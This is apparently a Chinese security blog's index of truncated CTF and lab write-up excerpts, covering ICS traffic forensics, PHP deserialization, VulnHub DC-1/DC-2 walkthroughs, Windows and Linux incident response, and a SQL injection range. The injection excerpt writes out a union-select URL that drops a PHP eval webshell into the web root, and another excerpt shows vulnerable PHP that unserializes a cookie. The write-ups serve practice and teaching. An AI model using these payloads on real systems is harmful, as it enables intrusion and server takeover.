工控流量分析
异常的文件
现存在一份被黑客攻击修改了的工程文件,请应急工作人员找出黑客攻击的痕迹,flag格式为:flag{}。
下载得到压缩包,根据题目描述的提示我们可以得知,此题是需要我们对被修改后的文件,进行痕迹查找,通常在进行痕迹查找是我们用查找日志的方法比较多,这里我们理解出题的考点就是要在众多零碎的文件中找到,特定的痕迹(flag)。
123strings $(find | xargs) | grep flag#“|”管道符,将标准输出流转换为标准输入流#“xargs” 将是将标准输入转为命令行参数,一般搭配管道符“|”使用
简单的Modbus协议分析
由于操作员操作不当导致化工车间蒸馏塔控制器程序出错,请分析错误程序查找错误点并获得flag,flag格式为flag{}。
使用wireshark打开t3.pacp后过滤modbus协议,发现流量包中并未存在使用modbus进行流量传输,之后使用strings命令发现存在可疑16进制字符串,将16进制转ASCII得到flag
12666c61677b444773775466677931474432333666733273664632 ...
通过sql注入拿下内网(封神台)
前台界面sql注入进入界面是封神台的招牌猫舍,大家都知道这个界面存在sql注入,经过测试这个确实也存在sql注入,但这个靶场考察点是内网渗透所以重点并不在sql这边。
通过sql注入拿到webshell使用sqlmap进行注入的到服务器系统及mysql路径信息,可以看到服务器为windows服务器,后端语言是PHP5,mysql路径为c:/phpstudy/mysql,根据mysql路径可以得出网站使用phpstudy做集成系统,推测网站主目录在c:/phpstudy/www目录下。
使用sql语句讲一句话木马写入网站当中,并命名为bg.php
1http://afsgr16-b1ferw.aqlab.cn/?id=7 union select 1,'<?php eval($_POST[123]) ?>' into dumpfile 'C:/phpStudy/www/bg1.php'
使用蚁剑连接一句话木马,成功连接,并得到服务器的 系统版本为Windows Server 2008 R2 ...
两道强网杯web题解
在博客上记录一下强网杯两道做出的web题目的详细解析,因为题目已经关闭,所以只能通过源码加解释的方法对题目进行解析,我会尽量解析的比较细致。
rcefile首先打开页面为文件上传功能页面,根据比赛经验,此类题目通常会给你读取源码的方法,这里我们直接尝试www.zip,成功下载到源码
12345678910111213<?phpspl_autoload_register();error_reporting(0);function e($str){ return htmlspecialchars($str);}$userfile = empty($_COOKIE["userfile"]) ? [] : unserialize($_COOKIE["userfile"]);?><p> <a href="/index.php">Index</a> <a href="/showfile.php">files</a ...
强国杯WP
有道云笔记 (youdao.com)
强国杯初赛最终排名全国第17.也是顺利的进入了半决赛,校队的WP链接放在这作为保存备份
PHP反序列化的N道例题(持续更新)
前言最近在刷题过程中发现对PHP反序列化的理解还不够深刻,对于其如何通过序列化的漏洞达到执行恶意代码的过程不够清晰,于是我将遇到的PHP反序列化题目整理到这篇文章中,后续将会持续更新
如果对php反序列化的概念还不了解,可以看我之前的文章PHP中的反序列化 | 北轨的博客 (beigui.xyz)
第一题 反序列化和文件包含的简单结合123456789101112131415161718192021222324252627282930<?php# 第一部分 包含flag.phpinclude "flag.php";#第二部分 创建connection类并传递file参数class Connection{ public $file; public function __construct($file) { $this->file = $file; } public function __sleep() { $this->file = 's ...
vulnhub_DC2靶场复现
前言这篇文章是vulnhub靶场DC系列复现的第二篇,需要用到的知识点,如下
字典生成工具cewl(flag2)
wpsacn(flag2)
rbash逃逸(flag4)
git提权(flag5)
靶机地址:DC: 2 ~ VulnHub
靶场描述(官网机翻)与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。
与最初的DC-1一样,它的设计考虑了初学者的需求。
Linux技能和熟悉Linux命令行是必须的,基本的渗透测试工具的一些经验也是如此。
就像DC-1一样,有五个标志,包括最终标志。
同样,就像DC-1一样,这些标志对初学者来说很重要,但对那些有经验的人来说并不那么重要。
简而言之,唯一真正重要的标志是最终的标志。
对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。
我还没有探索所有实现root的方法,因为我放弃了我一直在研究的先前版本,除了基本的操作系统安装之外,我开始了全新的工作。
信息收集1.靶场搭建环节跟DC1一样流程,在搭建好靶机后,将靶机网络环境改为NAT模式。使用nmap对网段进行存活主机检测,其中IP为1 ...
vulnhub_DC1靶场复现
前言最近在家空闲时间增多,遂将vulhub靶场复现记录一番,第一篇文章从DC1开始写起,DC系列靶场在官方描述中属于初级靶场,所以我们先由DC1开始由浅入深。
靶场描述(官网机翻)DC-1是一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。
它旨在为初学者带来挑战,但它的难易程度将取决于您的技能和知识以及您的学习能力。
要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。
有多种方法可以获得根,但是,我已经包含了一些包含初学者线索的标志。
总共有五个标志,但最终目标是在根的主目录中查找并读取该标志。您甚至不需要是root就可以执行此操作,但是,您将需要root权限。
根据您的技能水平,您可以跳过查找这些标志中的大多数,并直接找到根。
初学者可能会遇到以前从未遇到过的挑战,但是Google搜索应该是获得完成此挑战所需信息所需的全部内容。
环境搭建在官网下载DC1的系统压缩包 https://download.vulnhub.com/dc/DC-1.zip
将 ...
windows应急响应入侵排查
当企业发生黑客入侵、系统崩溃或其他影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短的时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。
常见的应急响应事件分类:
web入侵:网页挂马、主页篡改、Webshell
系统入侵:病毒木马、勒索软件、远控后门
网络攻击:DDOS攻击、DNS劫持、ARP欺骗
针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Window服务器入侵排查的思路。
0x01 入侵排查思路一、检查系统账号安全1.查看服务器是否有弱口令,远程管理端口是否对往公网开放。检查方法:
a、根据实际情况咨询相关服务器管理员。
b、根据弱口令检查工具来检查弱口令。
2.查看服务器是否存在可疑账号、新增账号。检查方法:
打开cmd窗口,输入lusrmgr.msc命令,查看是否有新增/可疑的账号,如有管理员群组的(Administrator)里的新增账号,请立即禁用或删除。
3.查看服务器是否存在隐藏账号、克隆账号。检查方法:
a、打开注册表,查看管理 ...
linux应急响应入侵排查
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。
针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
文章来源
0x01 入侵排查思路一、账号安全基本使用:1、用户信息文件 /etc/passwd
12root:x\:0:0:root:/root:/bin/bashaccount:password:UID:GID:GECOS:directory:shell
用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后shell
注意:无密码只允许本机登陆,远程不允许登陆
2、影子文件 /etc/shadow
12root:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1 ...
Dest0g3迎新赛部分WP
MISCWelcome to fxxking DestCTF签到题关注公众号回复:Give me the fxxking flag
Pngenius使用zsteg查看是否存在LSB隐写数据
可以看到存在一个ZIP文件,并且lsb信息当中写着压缩包密码,使用zsteg分离从图片中分离压缩包,使用密码解密得到flag
1zsteg -e extradata:0 Dest0g3.png Dest0g3.png >> 1.zip
EasyEncode下载得到一个有密码的压缩包,仔细检查过后没有发现关于密码的提示,使用ziperello爆破得到密码
打开压缩包当中的文件发现是 .和-推测为摩斯密码,对摩斯密码解密得到一串16进制字符串,对16进制转ASCII得到unicode字符再进行解码得到flag
Python_jail下载附件,打开后有三个文件一个是hint.txt,另一个是password.txt,第三个是一个有密码的压缩包,将password.txt打开后全部由空格和tab组成,这里有一个之前没有遇到的知识点就是空白字符编程,我们利用在线工具解出password后, ...